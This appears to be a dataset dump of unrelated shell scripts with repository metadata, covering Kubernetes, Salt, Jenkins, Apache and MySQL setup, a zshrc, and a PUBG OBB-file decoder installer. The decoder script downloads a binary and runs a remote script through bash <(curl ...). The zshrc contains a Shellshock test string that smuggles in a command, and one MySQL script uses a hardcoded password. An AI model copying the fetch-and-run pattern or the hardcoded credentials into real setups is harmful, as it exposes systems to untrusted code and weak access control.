cp ${KEY_DIR}/* /etc/kubernetes/ssl/ -rf
## ๅ็ปญ่ฎพ็ฝฎ
sh install/tail_install.sh
sh install/tools_install.sh
## systemctl้
็ฝฎ
SYSTEMCTL_DIR=../etc/systemctl/
SYSTEM_DIR=/usr/lib/systemd/system/
cp ${SYSTEMCTL_DIR}/kube-apiserver.service ${SYSTEM_DIR}
cp ${SYSTEMCTL_DIR}/kube-controller-manager.service ${SYSTEM_DIR}
cp ${SYSTEMCTL_DIR}/kube-proxy.service ${SYSTEM_DIR}
cp ${SYSTEMCTL_DIR}/kube-scheduler.service ${SYSTEM_DIR}
cp ${SYSTEMCTL_DIR}/kubelet.service ${SYSTEM_DIR}
## ๅฏๅจๆๅก
systemctl daemon-reload
for k in kube-apiserver \
kube-controller-manager \
kube-scheduler \
kubelet \
kube-proxy
do systemctl stop $k;
systemctl start $k;
systemctl enable $k;
systemctl status $k -l;
done
| true
|
709f019c7f09c89830e09acd1b3e81bc3d4478ed
|
Shell
|
xordoquy/salt
|
/pkg/osx/scripts/preflight.sh
|
UTF-8
| 833
| 3.21875
| 3
|
[
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
###############################################################################
#
# Title: Pre Install Script for Salt Installation
# Authors: Shane Lee
# Date: December 2015
#
# Description: This script stops the salt minion service before attempting to
# install Salt on Mac OSX
#
# Requirements:
# - None
#
# Usage:
# This script is run as a part of the OSX Salt Installation
#
###############################################################################
###############################################################################
# Stop the service
###############################################################################
set -e
if /bin/launchctl list "com.saltstack.salt.minion" &> /dev/null; then
/bin/launchctl unload "/Library/LaunchDaemons/com.saltstack.salt.minion.plist"
fi
| true
|
410a71cb4be382945684bc7eeabc4920048e6958
|
Shell
|
jan-swiecki/hyzone
|
/installers/python.sh
|
UTF-8
| 488
| 2.53125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
sudo apt-get install -y build-essential checkinstall
mkdir -p ~/python-install
cd ~/python-install
wget https://www.python.org/ftp/python/3.5.1/Python-3.5.1.tar.xz
tar xJf ./Python-3.5.1.tar.xz
cd ./Python-3.5.1
./configure --prefix=/opt/python3.5 --with-ensurepip=install
make && sudo make install
sudo ln -s /opt/python3.5/bin/python3 /usr/local/bin/python
sudo ln -s /opt/python3.5/bin/pip3 /usr/local/bin/pip
sudo pip install --upgrade pip
cd ~
sudo rm -rf python-install
| true
|
40338f0b8498453e20c1a351d4afa51316eefa7e
|
Shell
|
srivathsanmurali/.dotfiles
|
/bin/bmarks
|
UTF-8
| 282
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/sh
# Bookmarks through dmenu
# Userscript for qutebrowser
set -e
url=$(find ~/.config/qutebrowser/bookmarks/ -type f -exec cat {} + |
dmenu -p "open $@" -i -l 15 |
awk '{print $1}')
if [ -z "$url" ]; then
exit 0;
fi
#echo "open $@ $url" >> "$QUTE_FIFO"
$BROWSER $url
| true
|
6a27de42f757d3d8803b23150f3aa402c2685a49
|
Shell
|
liuxinjie123/docker-jenkins
|
/get_jenkins.sh
|
UTF-8
| 185
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
if [[ ! -f jenkins.war ]]; then
curl -fL http://mirrors.jenkins-ci.org/war-stable/$JENKINS_VERSION/jenkins.war -o jenkins.war
else
echo "jenkins.war already exists";
fi
| true
|
cd48373f1ee85c05444411e863b42d4b6123e4de
|
Shell
|
tmanev/quis-listing
|
/deployment_scripts/apache-balancer.sh
|
UTF-8
| 3,574
| 3.640625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/sh
# Set up a default search path
PATH="/usr/bin:/bin"
CURL=`which curl`
if [ -z "$CURL" ]; then
echo "curl not found"
exit 1
fi
server="localhost"
port="80"
manager="balancer-manager"
while getopts "s:p:m:" opt; do
case "$opt" in
s)
server=$OPTARG
;;
p)
port=$OPTARG
;;
m)
manager=$OPTARG
;;
esac
done
shift $(($OPTIND - 1))
action=$1
list_balancers() {
$CURL -s "http://${server}:${port}/${manager}" | grep "balancer://" | sed "s/.*balancer:\/\/\(.*\)<\/a>.*/\1/"
}
list_workers() {
balancer=$1
if [ -z "$balancer" ]; then
echo "Usage: $0 [-s host] [-p port] [-m balancer-manager] list-workers balancer_name"
echo " balancer_name : balancer name"
exit 1
fi
$CURL -s "http://${server}:${port}/${manager}" | grep "/balancer-manager?b=${balancer}&w" | sed "s/.*href='\(.[^']*\).*/\1/" | sed "s/.*w=\(.*\)&.*/\1/"
}
enable() {
balancer=$1
worker=$2
if [ -z "$balancer" ] || [ -z "$worker" ]; then
echo "Usage: $0 [-s host] [-p port] [-m balancer-manager] enable balancer_name worker_route"
echo " balancer_name : balancer/cluster name"
echo " worker_route : worker route e.g.) ajp://192.1.2.3:8009"
exit 1
fi
nonce=`$CURL -s "http://${server}:${port}/${manager}" | grep nonce | grep "${balancer}" | sed "s/.*nonce=\(.*\)['\"].*/\1/" | tail -n 1`
if [ -z "$nonce" ]; then
echo "balancer_name ($balancer) not found"
exit 1
fi
echo "Enabling $2 of $1..."
# Apache 2.2.x
#$CURL -s -o /dev/null -XPOST "http://${server}:${port}/${manager}?" -d b="${balancer}" -d w="${worker}" -d nonce="${nonce}" -d dw=Enable
$CURL -s -o /dev/null -XPOST "http://${server}:${port}/${manager}?" -d b="${balancer}" -d w="${worker}" -d nonce="${nonce}" -d w_status_D=0
sleep 2
status
}
disable() {
balancer=$1
worker=$2
if [ -z "$balancer" ] || [ -z "$worker" ]; then
echo "Usage: $0 [-s host] [-p port] [-m balancer-manager] disable balancer_name worker_route"
echo " balancer_name : balancer/cluster name"
echo " worker_route : worker route e.g.) ajp://192.1.2.3:8009"
exit 1
fi
echo "Disabling $2 of $1..."
nonce=`$CURL -s "http://${server}:${port}/${manager}" | grep nonce | grep "${balancer}" | sed "s/.*nonce=\(.*\)['\"].*/\1/" | tail -n 1`
if [ -z "$nonce" ]; then
echo "balancer_name ($balancer) not found"
exit 1
fi
# Apache 2.2.x
#$CURL -s -o /dev/null -XPOST "http://${server}:${port}/${manager}?" -d b="${balancer}" -d w="${worker}" -d nonce="${nonce}" -d dw=Disable
$CURL -s -o /dev/null -XPOST "http://${server}:${port}/${manager}?" -d b="${balancer}" -d w="${worker}" -d nonce="${nonce}" -d w_status_D=1
sleep 2
status
}
status() {
$CURL -s "http://${server}:${port}/${manager}" | grep "href" | sed "s/<[^>]*>/ /g"
}
case "$1" in
list-balancer)
list_balancers "${@:2}"
;;
list-worker)
list_workers "${@:2}"
;;
enable)
enable "${@:2}"
;;
disable)
disable "${@:2}"
;;
status)
status "${@:2}"
;;
*)
echo "Usage: $0 {list-balancer|list-worker|enable|disable|status}"
echo ""
echo "Options: "
echo " -s server"
echo " -p port"
echo " -m balancer-manager-context-path"
echo ""
echo "Commands: "
echo " list-balancer"
echo " list-worker balancer-name"
echo " enable balancer_name worker_route"
echo " disable balancer_name worker_route"
exit 1
esac
exit $?
| true
|
9c49ce3a7f311733cc680e7eec6d63d700ea934c
|
Shell
|
kergoth/mac-game-tools
|
/set-graphics-mac
|
UTF-8
| 420
| 3.3125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
PATH="$(dirname "$0"):$PATH"
tmpfile="$(mktemp -t "mac-graphics.reg.XXXXXX")" || exit 1
trap 'rm -f "$tmpfile"' EXIT INT TERM
cat >"$tmpfile" <<END
REGEDIT4
[HKEY_CURRENT_USER\\Software\\Wine\\Drivers]
"Graphics"="mac"
END
for app; do
app="${app%.app}.app"
if ! grep -qx '"Graphics"="mac"' "$app/Contents/Resources/user.reg"; then
wineskin-run "$app" wine regedit /C "$tmpfile"
fi
done
| true
|
a17833d987690e7bda2b023786b87ccf54266f17
|
Shell
|
wmayner/dotfiles
|
/zsh/zshrc.symlink
|
UTF-8
| 17,155
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env zsh
# vim: sw=2 ts=2 sts=2 tw=80 foldmarker={,} foldlevel=0 foldmethod=marker
#
# zshrc of wmayner
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
# zshrc.before.local {
# Put system-specific stuff that needs to be sourced early in
# `~/.zshrc.before.local`.
[ -f "$HOME/.zshrc.before.local" ] && source "$HOME/.zshrc.before.local"
# }
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ ! -f ~/.p10k.zsh ]] || source ~/.p10k.zsh
OS=$(uname -s)
# Environment variables {
export DEFAULT_USER="will"
# Set the default editor
export EDITOR="vim"
export VISUAL="vim"
# Development directory
export DEV="$HOME/dev"
# Project directory
export CODE="$DEV/projects"
# Path to dotfiles repo
export DOTFILES="$HOME/dotfiles"
# Locale
export LANG="en_US.UTF-8"
export LC_ALL="$LANG"
# Lazily load nvm
export NVM_LAZY_LOAD=true
# }
# PATH {
# TeX commands
export PATH="$PATH:/usr/texbin"
# NVIDIA CUDA libraries
export PATH="$PATH:/Developer/NVIDIA/CUDA-8.0/bin"
export DYLD_LIBRARY_PATH="/Developer/NVIDIA/CUDA-8.0/lib:$DYLD_LIBRARY_PATH"
if [ "$OS" = "Darwin" ]; then
# GNU-utilities
export PATH="/usr/local/opt/grep/libexec/gnubin:$PATH"
# Add Visual Studio Code (code)
# export PATH="$PATH:/Applications/Visual Studio Code.app/Contents/Resources/app/bin"
export PATH="$PATH:/Applications/Visual Studio Code - Insiders.app/Contents/Resources/app/bin"
fi
# User-local executables
export PATH="$HOME/.local/bin:$PATH"
# Dotfile executables
export PATH="$HOME/dotfiles/bin:$PATH"
# Local executables
export PATH="$HOME/bin:$PATH"
# }
# Python {
# # virtualenvwrapper {
# export WORKON_HOME="$HOME/.virtualenvs"
# export PROJECT_HOME="$CODE"
# export VIRTUALENV_PYTHON="$(which python3)"
# export VIRTUALENVWRAPPER_PYTHON="$(which python3)"
# export VIRTUAL_ENV_DISABLE_PROMPT=1
# source "$(which virtualenvwrapper.sh)"
# # Auto-set VIRTUAL_ENV in tmux
# if [[ -n "$TMUX" ]] && [ -n "$VIRTUAL_ENV" ]; then
# tmux set-environment VIRTUAL_ENV $VIRTUAL_ENV
# fi
# # Activate VIRTUAL_ENV if set
# if [ -n "$VIRTUAL_ENV" ]; then
# source $VIRTUAL_ENV/bin/activate # commented out by conda initialize
# fi
# }
# conda {
# >>> conda initialize >>>
# !! Contents within this block are managed by 'conda init' !!
__conda_setup="$('/Users/will/miniconda3/bin/conda' 'shell.zsh' 'hook' 2> /dev/null)"
if [ $? -eq 0 ]; then
eval "$__conda_setup"
else
if [ -f "/Users/will/miniconda3/etc/profile.d/conda.sh" ]; then
. "/Users/will/miniconda3/etc/profile.d/conda.sh"
else
export PATH="/Users/will/miniconda3/bin:$PATH"
fi
fi
unset __conda_setup
# <<< conda initialize <<<
# }
# Get base environment Python version
local PYTHON_VERSION=$("$HOME/miniconda3/bin/python" --version | cut -c 8,9,10)
if [[ -v TMUX ]]; then
tmux source-file "$HOME/.tmux.conf"
conda deactivate; conda activate base
fi
# }
# oh-my-zsh {
# Prevent loading https://github.com/ohmyzsh/ohmyzsh/blob/master/lib/compfix.zsh
# since it slows down the prompt considerably
ZSH_DISABLE_COMPFIX=true
# Path to your oh-my-zsh configuration
ZSH="$HOME/.oh-my-zsh"
# Path to your oh-my-zsh custom directory (default is .oh-my-zsh/custom/)
ZSH_CUSTOM=".oh-my-zsh/custom"
# Set name of the theme to load.
# Look in ~/.oh-my-zsh/themes/
# Optionally, if you set this to "random", it'll load a random theme each
# time that oh-my-zsh is loaded.
ZSH_THEME="powerlevel10k/powerlevel10k"
# Example aliases
# alias zshconfig="mate ~/.zshrc"
# alias ohmyzsh="mate ~/.oh-my-zsh"
# Set to this to use case-sensitive completion
# CASE_SENSITIVE="true"
# Comment this out to disable bi-weekly auto-update checks
# DISABLE_AUTO_UPDATE="true"
# Uncomment to change how many often would you like to wait before
# auto-updates occur? (in days)
export UPDATE_ZSH_DAYS=7
# Uncomment following line if you want to disable colors in ls
# DISABLE_LS_COLORS="true"
# Uncomment following line if you want to disable autosetting terminal
# title.
# DISABLE_AUTO_TITLE="true"
# Uncomment following line if you want red dots to be displayed while
# waiting for completion
COMPLETION_WAITING_DOTS="true"
# Which plugins would you like to load? (plugins can be found in
# ~/.oh-my-zsh/plugins/*)
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
plugins=(
grunt brew command-not-found git github git-flow git-extras git-hubflow
history-substring-search fasd macos python lol
)
source "$ZSH/oh-my-zsh.sh"
# }
# Keybindings {
# Use vi to edit command line
bindkey -v
# Remove delay in entering command mode, as described by
# http://zsh.sourceforge.net/Guide/zshguide04.html:
#
# You can remove all bindings starting with a given prefix by adding the `-p
# option. The example given in the manual,
# bindkey -rpM viins '\e'
# (except it uses the equivalent form `^[') is amongst the most useful, as it
# will remove the annoying delay after you type `\e' to enter vi command mode.
# The delay is there because the cursor keys usually also start with \e and
# the shell is waiting to see if you actually typed one of those.
# bindkey -rpM viins "\e"
# Use control+j and control+k for scrolling through history, since removing
# all bindings that begin with escape also removes the arrow-key bindings
bindkey "^K" history-substring-search-up
bindkey "^J" history-substring-search-down
# Press Ctrl+Q to push the current command on to the stack. It will disappear,
# allowing you to enter another command, after which it will reappear in the
# prompt.
bindkey "^Q" push-input
# }
# Tool configuration {
# Autoenv {
# See https://github.com/inishchith/autoenv
export AUTOENV_ENABLE_LEAVE='yes'
source ~/.autoenv/activate.sh
# }
# gpg {
export GPG_TTY=$TTY
# }
# zsh {
# Use extended globbing
setopt extendedglob
# }
# Homebrew {
export HOMEBREW_NO_ANALYTICS=1
# }
# dircolors {
autoload colors;
# Find the option for using colors in ls, depending on the version
ls --color -d . &>/dev/null 2>&1 && alias ls='ls --color=auto -F' || alias ls='ls -GF'
# Use dircolors if available
dircolors &>/dev/null 2>&1 && eval `dircolors $DOTFILES/zsh/dircolors.ansi-dark` || export LSCOLORS="Gxfxcxdxbxegedabagacad"
# Use GNU ls if available (for macOS: `brew install coreutils`)
gdircolors &>/dev/null 2>&1 && eval `gdircolors $DOTFILES/zsh/dircolors.ansi-dark` && alias ls='gls --color=auto -hF'
export GREP_COLOR='1;31'
# }
# git {
# Fix slow tab completion
__git_files () {
_wanted files expl 'local files' _files
}
# }
# less {
# Pygmentize less automatically
# (requires pygmentize to be available; `pip install pygments`)
export LESSOPEN='|$HOME/.lessfilter %s'
# }
# SHELLSHOCK {
# To anyone worried about using servers that may not have attentive admins -
# put the following line(s) in your ~/.bashrc to help protect yourself:
env x='() { :;}; echo "WARNING: SHELLSHOCK DETECTED"' \
bash --norc -c ':' 2>/dev/null;
# It will print to stdout if and only if your shell is vulnerable, and nothing
# will be printed if your shell has been patched. It will take a little longer
# to launch a new shell slightly, but for some, this may be worth it.
# }
# nvm {
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
# This loads nvm bash_completion
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion"
# }
# node {
# Grunt task tab-completion
command -v grunt >/dev/null && eval "$(grunt --completion=zsh)"
# Gulp task tab-completion
command -v gulp >/dev/null && eval "$(gulp --completion=zsh)"
# }
# fasd {
# Don't limit characters between matches
export _FASD_FUZZY=100
# Initialize
eval "$(fasd --init auto)"
# }
# iterm {
test -e "${HOME}/.iterm2_shell_integration.zsh" && source "${HOME}/.iterm2_shell_integration.zsh"
# }
# zmv (alternative to mmv) {
autoload zmv
# }
# travis {
[ -f "$HOME/.travis/travis.sh" ] && source "$HOME/.travis/travis.sh"
# }
# fzy {
function insert-fzy-path-in-command-line() {
local selected_path
echo # Run fzy underneath the current prompt
selected_path=$(ag . -l -g '' | fzy) || return
LBUFFER="$LBUFFER${(q)selected_path} " # ${(q)VAR} shell-escapes the string
zle reset-prompt
}
zle -N insert-fzy-path-in-command-line
# By default, ^S freezes terminal output, only needed if keybinding is ^S
unsetopt flowcontrol
bindkey "^S" "insert-fzy-path-in-command-line"
# }
# fzf {
_gen_fzf_default_opts() {
local base03="234"
local base02="235"
local base01="240"
local base00="241"
local base0="244"
local base1="245"
local base2="254"
local base3="230"
local yellow="136"
local orange="166"
local red="160"
local magenta="125"
local violet="61"
local blue="33"
local cyan="37"
local green="64"
# Comment and uncomment below for the light theme.
# Solarized Dark color scheme for fzf
export FZF_DEFAULT_OPTS="
--reverse
--color fg:-1,bg:-1,hl:$blue,fg+:$base2,bg+:$base02,hl+:$blue
--color info:$yellow,prompt:$yellow,pointer:$base3,marker:$base3,spinner:$yellow
"
## Solarized Light color scheme for fzf
#export FZF_DEFAULT_OPTS="
# --color fg:-1,bg:-1,hl:$blue,fg+:$base02,bg+:$base2,hl+:$blue
# --color info:$yellow,prompt:$yellow,pointer:$base03,marker:$base03,spinner:$yellow
#"
}
_gen_fzf_default_opts
# Accept history selection instead of putting it on the command line
fzf-history-widget-accept() {
fzf-history-widget
zle accept-line
}
zle -N fzf-history-widget-accept
bindkey '^X^R' fzf-history-widget-accept
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
# }
# fast-p {
p () {
ag -U -g ".pdf$" \
| fast-p \
| fzf --read0 --reverse -e -d $'\t' \
--preview-window down:80% --preview '
v=$(echo {q} | tr " " "|");
echo -e {1}"\n"{2} | grep -E "^|$v" -i --color=always;
' \
| cut -z -f 1 -d $'\t' | tr -d '\n' | xargs -r --null open
}
# }
# PyPhi {
export PYPHI_WELCOME_OFF='no'
# }
# }
# Aliases {
# General {
# List only directories
alias lsd="ls -d */"
# Allow colors with less
alias less="less -R"
# Get the absolute path of a file
alias fullpath="readlink -f"
# Use colordiff instead of native diff
alias diff="colordiff"
# Always sudo htop (doesn't work properly on macOS otherwise)
if [ "$OS" = "Darwin" ]; then
alias htop="sudo htop"
fi
# list dir contents (with human-readable sizes)
alias l="ls -AhG1F"
alias ll="ls -lAhGF"
alias lsa="ls -AhGF"
# Safe rm
alias t="trash"
# Clear screen
alias c="clear"
# Clear screen and list contents
alias cl="clear && l"
# Clear screen and print directory tree
alias ck="clear && tree"
# Move up one directory
alias ..="cd .."
# Human-readable disk usage information
alias df="df -h"
# Forward port
alias forward="ssh -NL"
# Syntax highlighting with Pygments
alias hl="pygmentize -g"
# MATLAB binary
alias matlab="/Applications/MATLAB_R2016a.app/bin/matlab"
# ag with custom colors and restricted line width
alias ag="ag --color-line-number 34 --color-match 36 --color-path 32 --width 100"
# }
# vim {
# Editing shortcuts
alias v="vim"
# Edit configuration (from within dotfiles, for interacting with repo)
alias vrc='$EDITOR $(realpath $HOME/.vimrc)'
# }
# git {
alias gp="git push"
# git diff
alias gc="git commit -m"
# git diff
alias gd="git d"
# git diff
alias gdc="git dc"
# git log
alias gl="git l"
# git log all branches
alias gla="git la"
# git branch
alias gb="git branch"
# git branch delete
alias gbd="git branch -d"
# git flow
alias gf="git flow"
# git flow feature
alias gff="git flow feature"
# git flow release
alias gfr="git flow release"
# git flow hotfix
alias gfh="git flow hotfix"
# fast git status
alias g="git status"
# edit .gitconfig
alias vgrc="$EDITOR $HOME/.gitconfig"
# }
# Python {
# Python interpreter
alias p="python"
# IPython intepreter
alias ip="ipython"
# Distribution
alias testregister="python setup.py register -r testpypi"
alias testupload="python setup.py sdist bdist_wheel upload -r testpypi"
alias pypiregister="python setup.py register -r pypi"
alias pypiupload="python setup.py sdist bdist_wheel register upload --sign -r pypi"
# remove dot from py.test executable
alias pytest="python -m pytest"
# }
# conda {
alias deactivate="conda deactivate"
alias activate="conda activate"
alias workon="conda activate"
# }
# LaTeX {
# Run latexmk with following options: compile to pdf, preview continuously
alias latexmk="latexmk -pdf -pvc"
alias ltx="latexmk"
# Edit .tex files in the current directory
alias vtex="find . -iname '*.tex' -exec $EDITOR {} \;"
# }
# fasd {
# Directory change {
alias j="fasd_cd -d"
# restrict matches to subdirectories of the current directory.
alias jc="fasd_cd -dc"
# show a brief help message
alias jh="fasd_cd -h"
# list only
alias jl="fasd_cd -dl"
# match by rank only
alias jr="fasd_cd -dr"
# match by recent access only
alias jt="fasd_cd -dt"
# }
# Output matches to stdout, for use with backticks {
alias jj="fasd -d"
# restrict matches to subdirectories of the current directory.
alias jjc="fasd -dc"
# show a brief help message
alias jjh="fasd -h"
# list only
alias jjl="fasd -dl"
# match by rank only
alias jjr="fasd -dr"
# match by recent access only
alias jjt="fasd -dt"
# }
# }
# zsh {
# Edit zsh config
alias vsh='$EDITOR $(realpath $HOME/.zshrc)'
# Source zsh config
alias szsh='source $(realpath $HOME/.zshrc)'
# }
# browser {
if [ "$OS" = "Darwin" ]; then
alias firefox='/Applications/Firefox.app/Contents/MacOS/firefox'
fi
# }
# }
# Functions {
# conda {
create_conda_env() {
conda create -n $1 -y && \
conda activate $1
}
setup_conda_env() {
nvm > /dev/null
local DEFAULT_PYTHON_VERSION='3.8'
if [[ -z "$1" ]]; then
echo "No python version specified; assuming $DEFAULT_PYTHON_VERSION" 1>&2
local PYTHON_VERSION="$DEFAULT_PYTHON_VERSION"
else
local PYTHON_VERSION="$1"
fi
conda install -y \
python=$PYTHON_VERSION \
jupyterlab \
ipywidgets \
scipy \
numpy \
pandas \
&& \
python -m pip install \
black \
blackcellmagic \
&& \
jupyter labextension install \
@jupyter-widgets/jupyterlab-manager \
@jupyterlab/toc \
@pyviz/jupyterlab_pyviz \
jupyterlab_vim \
&& \
echo "Finished setting up environment." 1>&2
}
conda_install() {
# Don't install anything into base environment
if [[ -v CONDA_DEFAULT_ENV ]] then
conda install $@
else
echo 'No active environment; not installing'
fi
}
alias cinstall='conda_install'
pip() {
# Don't install anything into base environment
if [[ -v CONDA_DEFAULT_ENV ]] then
string=$(which python)
word='envs'
if test "${string#*$word}" != "$string"; then
python -m pip $@
# Invoke pip directly through python
# See https://jakevdp.github.io/blog/2017/12/05/installing-python-packages-from-jupyter/
else
echo 'Python is not installed in this environment; not running'
fi
else
echo 'No active environment; not running'
fi
}
# zsh precmd() function: special function that's executed before each command
# precmd() {
# conda_auto_env
# }
# }
# }
# zshrc.local {
# Put system-specific stuff in `~/.zshrc.local`.
[ -f "$HOME/.zshrc.local" ] && source "$HOME/.zshrc.local"
# }
| true
|
c98f970c863b07963c4d8621f8767fbc29af7811
|
Shell
|
bridgecrew-perf7/deploy_nginx_without_mysql
|
/add_base.sh
|
UTF-8
| 284
| 2.828125
| 3
|
[] |
no_license
|
# create random password
USER_NAME=faser
PASSWDDB=faser
# replace "-" with "_" for database username
MAINDB=${USER_NAME//[^a-zA-Z0-9]/_}
mysql -uroot -e "CREATE DATABASE $MAINDB"
mysql -uroot -e "GRANT ALL PRIVILEGES ON $MAINDB.* TO $MAINDB@localhost IDENTIFIED BY '$PASSWDDB'"
| true
|
e76521e8c30745ab358266717a3e79bb8415af6a
|
Shell
|
IAMX-YT/OBBDECODER
|
/Setup.sh
|
UTF-8
| 1,710
| 3.03125
| 3
|
[] |
no_license
|
#!/data/data/com.termux/files/usr/bin/bash env
############################################
# [IAMX] PUBG OBB DECRYPTER
############################################
echo "welcome To Our New OBB file Decrypter By IAMX"
sleep 1
echo ""
echo "Connecting..."
sleep 4
#Get The permission of Termux
echo "Type y"
termux-setup-storage
#REFRESH TERMUX
apt update && apt upgrade
gem install lolcat
#Checking Required Pakcages
echo -e "Installing... Required packages"
apt install wget -y
apt install toilet -y
pkg install wget
pkg install mpv -y
pkg install toilet
pkg install pv
pkg install curl
pkg install x11-repo
pkg install qemu-system-i386
pkg install qemu-user-i386
# Remove existing files
if
[ -e /data/data/com.termux/files/home/XDECODER ]
then
rm -rf /data/data/com.termux/files/home/XDECODER
fi
mkdir /data/data/com.termux/files/home/XDECODER
#DOWNLOAD TOOLS
wget https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/XDECODER -O /data/data/com.termux/files/home/XDECODER/quickbms
wget https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/IAMX -O /data/data/com.termux/files/home/XDECODER/IAMX.bms
wget https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/License -O /data/data/com.termux/files/home/XDECODER/License
wget https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/UpdateVersion -O /data/data/com.termux/files/home/XDECODER/UpdateVersion
toilet -f term -F gay "Complete"
sleep 2
toilet -f term -F gay "NEXT TIME USE THIS COMMAND"
sleep 1
toilet -f term -F gay "sh DECODE.sh and press Enter"
sleep 1
toilet -f term -F gay "Script Starting...."
#START OBB DECODER SCRIPT
bash <(curl -s https://raw.githubusercontent.com/IAMX-YT/OBBDECODER/master/DECODE.sh)
| true
|
958d609fefb5843bb2bb948e7238b8f8836264db
|
Shell
|
andikamc/opensvh
|
/source/script/expire-trojan
|
UTF-8
| 456
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
clear
trojanData=( `cat /etc/trojan/config.json | grep '^###' | cut -d ' ' -f 2`);
now=`date +"%Y-%m-%d"`
for user in "${trojanData[@]}"
do
exp=$(grep -w "^### $user" "/etc/trojan/config.json" | cut -d ' ' -f 3)
d1=$(date -d "$exp" +%s)
d2=$(date -d "$now" +%s)
exp2=$(( (d1 - d2) / 86400 ))
if [[ "$exp2" = "0" ]]; then
sed -i "/^### $user $exp/,/^},{/d" /etc/trojan/config.json
fi
done
systemctl restart trojan
| true
|
14d5229f2d58167aab12520abd9a58fa88d08648
|
Shell
|
clearpathrobotics/pr2-kinect2-packages
|
/debian/preinst
|
UTF-8
| 577
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
echo "This will install the pr2-kinect2-packages package on your computer."
echo "This package is only intended for use with an Intel NUC which will be connected to a Kinect 2."
echo "If run on a computer other than a NUC, it may irrevocably damage your OS installation."
read -r -p "If you understand and want to continue, please type this phrase exactly as it appears: 'Yes, I understand. Continue!' " input
if [[ $input == "Yes, I understand. Continue!" ]];
then
echo "Continuing with installation!"
exit 0
else
echo "Aborting installation!"
exit 1
fi
| true
|
a152e4d7ed5a975f4b080e7b37f27f467e640678
|
Shell
|
PettTo/Feature-Model-History-of-Linux
|
/KConfig_Analysis/analysis.sh
|
UTF-8
| 1,478
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
#### initiate variables
analysisRoot="../../Evaluation/KConfig_Analysis/"
interFile="../../Evaluation/KConfig_Analysis/interFile.txt"
shaFile="../../Evaluation/KConfig_Analysis/shas.txt"
kconfigReaderRun="../Tools/kconfigreader/run.sh"
dumpConf="../Tools/kconfigreader/binary_4.15/dumpconf"
archKConfig="arch/x86/Kconfig"
sha415="d8a5b80568a9cb66810e75b182018e9edb68e8ff"
#### get the commit sha's from relevant commits
echo "######## reade commits from git log ########"
git reset --hard
git clean -fxd
git checkout $sha415
git log arch/x86/Kconfig > $interFile
echo "######## create sha file ########"
> $shaFile
while IFS='' read -r line || [[ -n "$line" ]]; do
if [[ $line == commit* ]]
then
split=$(echo $line | tr " " "\n")
for str in $split
do
if ! [[ $str == commit* ]]
then
echo $str >> $shaFile
fi
done
fi
done < "$interFile"
echo "######## sha creation finished ########"
##### analyse all relevant revisions
echo "######## start analysis ########"
while IFS='' read -r sha || [[ -n "$sha" ]]; do
echo "### Analyse revsion: $sha ###"
git reset --hard
git clean -fxd
git checkout $sha
mkdir -p $analysisRoot/$sha
$kconfigReaderRun de.fosd.typechef.kconfig.KConfigReader --dumpconf $dumpConf --writeDimacs $archKConfig $analysisRoot/$sha/out
done < "$shaFile"
echo "######## analysis finished ########"
# clean up
echo "######## clean up the git ########"
git reset --hard
git clean -fxd
git checkout $sha415
| true
|
741a4f544e39ea13463f895de8c85ad0e7332246
|
Shell
|
malanchak/AuTuMN
|
/scripts/buildkite/setup.sh
|
UTF-8
| 1,745
| 2.53125
| 3
|
[
"BSD-2-Clause-Views"
] |
permissive
|
# See https://buildkite.com/organizations/autumn/agents#setup-ubuntu
# Run as root
# TODO: Put all SSH keys in /var/lib/buildkite-agent/.ssh/
# TODO: Add AWS creds to /etc/buildkite-agent/hooks/environment
# TODO: Install yarn and node v12
AGENT_TOKEN=xxx
sh -c 'echo deb https://apt.buildkite.com/buildkite-agent stable main > /etc/apt/sources.list.d/buildkite-agent.list'
apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 32A37959C2FA5C3C99EFBC32A79206696452D198
apt-get update
apt-get install -y buildkite-agent
sed -i "s/xxx/$AGENT_TOKEN/g" /etc/buildkite-agent/buildkite-agent.cfg
systemctl enable buildkite-agent
systemctl start buildkite-agent
# journalctl -f -u buildkite-agent
# Upgrade to 2 agents
systemctl stop buildkite-agent
systemctl disable buildkite-agent
# Create a systemd template
cp /lib/systemd/system/buildkite-agent.service /etc/systemd/system/buildkite-agent@.service
# Start 9 agents using the systemd template we created above
systemctl enable --now buildkite-agent@1
systemctl enable --now buildkite-agent@2
systemctl enable --now buildkite-agent@3
systemctl enable --now buildkite-agent@4
systemctl enable --now buildkite-agent@5
systemctl enable --now buildkite-agent@6
systemctl enable --now buildkite-agent@7
systemctl enable --now buildkite-agent@8
systemctl enable --now buildkite-agent@9
apt-get install -qq python3-pip virtualenv
# If you need to disable agents
systemctl disable buildkite-agent@1
systemctl disable buildkite-agent@2
systemctl disable buildkite-agent@3
systemctl disable buildkite-agent@4
systemctl disable buildkite-agent@5
systemctl disable buildkite-agent@6
systemctl disable buildkite-agent@7
systemctl disable buildkite-agent@8
systemctl disable buildkite-agent@9
| true
|
7cc0992b4ac9fc0f94d4105644f9e9041c65ffff
|
